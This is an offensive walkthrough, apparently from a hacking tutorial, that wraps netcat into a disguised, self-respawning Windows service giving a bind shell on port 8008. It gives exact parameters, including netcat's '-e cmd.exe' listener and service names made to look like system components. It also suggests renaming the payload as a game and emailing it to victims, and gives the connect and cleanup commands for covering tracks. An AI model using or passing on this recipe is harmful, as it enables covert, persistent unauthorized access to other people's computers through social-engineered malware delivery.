Launch ServifyThis.exe
The parameters are broken into two groups, parameters that apply to the local machine and remote parameters that apply to the machine where the "servified" executable will be installed.
Locally, we want to choose our copy of the netcat executable:
Application to "servify": c:\program files\attack tools\nc.exe
Remotely, we want to set netcat up to work like this:
Application Pathname: c:\windows\win32svc.exe Command Parameters: -l -p 8008 -e c:\windows\system32\cmd.exe Working Directory: c:\ Service Display Name: W32CriticalService Service Pathname: c:\windows\system32\w32critsvc.exe
Additionally, we need to make sure that the "Respawn" checkbox is checked, as it is by default. Finally, let's set our respawn interval to 1 sec.
Once we click on the "OK" button, ServifyThis spits out a new executable called "Servified.exe" in the current directory.
We then arrange for "Servified.exe" to be run on our target machine, say, by changing the name to something like "ReallyCoolGame.exe" and emailing it to the machine's user, for instance.
When Servified.exe is run on the target machine, it'll drop a copy of nc.exe into the c:\windows directory under the name win32svc.exe. It will create and drop a new service (c:\windows\system32\w32critsvc.exe) which it will install and launch. The sole purpose of this service is to launch the copy of nc.exe (now called c:\windows\win32svc.exe) with the parameters specified (which will cause it to listen on port 8008 and spawn a command shell back to anyone who connects to that port).
With that work done, Servified.exe will simply disappear, deleting itself.
We then use a local copy of netcat to connect up to our target:
c:\Program Files\Attack Tools>nc8008
This will return us a command shell anchored in the c:\ directory, as that's what we specified for nc.exe's working directory.
We can do anything we want to do with that backdoor, confident in the knowledge that it will both continuously respawn while the machine is running, and will autostart if the machine is rebooted.
Finally, once we've done our dirty work on the target machine, we can simply change to the c:\windows\system32 directory and issue the command:
c:\>w32critsvc -u
which will stop the running service, stop the running instance of nc, and delete both the c:\windows\win32svc.exe file and the c:\windows\system32\w32critsvc.exe file.